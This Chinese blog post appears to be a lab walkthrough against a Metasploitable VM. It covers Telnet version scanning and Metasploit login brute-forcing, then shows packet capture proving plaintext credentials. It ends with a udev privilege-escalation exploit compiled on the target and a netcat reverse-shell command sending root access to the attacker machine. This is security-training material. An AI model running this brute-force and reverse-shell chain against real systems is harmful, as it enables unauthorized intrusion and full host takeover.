Telnet相关安全

telnet属于TCP/IP协议族,是Internet远程登陆服务的标准协议与主要方式
本机ip 192.168.1.4
kali ip 192.168.10.129
metasploitable ip 192.168.10.133

Telnet暴力破解(之前文章提过,不做截图)
版本获取
nmap -p 23 -sV 192.168.10.133
msfconsole
use auxiliary/scanner/telnet/telnet_version
set rhosts 192.168.10.133
run
密码破解(这里的username也可以用字典文件来实现)
use auxiliary/scanner/telnet/telnet_login
set rhosts 192.168.10.133
set username msfadmin
set pass_file /root/Desktop/pass.txt
在这里插入图片描述
登陆测试
sessions -l
sessions -i id
telnet抓包分析(本机登陆metasploitable)(验证明文传输)
在这里插入图片描述

在这里插入图片描述

用本机抓的VMnet-8的网卡
Telnet登陆提权
常规msfconsole登陆,登陆后称为 远程端口
在这里插入图片描述
wget http://www.exploit-db.com/download/8572
在这里插入图片描述
因为页面时https,所以无法下载。
但是可以将页面下载到kali主机上,然后再下载到远程主机上。
在这里插入图片描述
然后将下载的文件安放到/var/www/html,重命名为test.c,打开test.c,再末尾加几个回车
cd /var/www/html
mv 8572 test.c
gedit test.c
打开apach服务
service apache2 start
在远程端口下载kali上的test.c
wget http://192.168.10.129/test.c
kali监听端口4444(再另一个终端打开)
nc -lvp 4444
在这里插入图片描述
编译执行获取root权限
gcc test.c -o exploit
echo ‘#!/bin/sh’>/tmp/run
echo ‘/bin/netcat -e /bin/sh 192.168.10.129 4444’>>/tmp/run
ps edf |grep udev
在这里插入图片描述
./exploit 2789
在这里插入图片描述
然后查看刚才再另一个窗口的nc
在这里插入图片描述
执行原因
echo那几条命令,可以看看test.c的代码注释

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值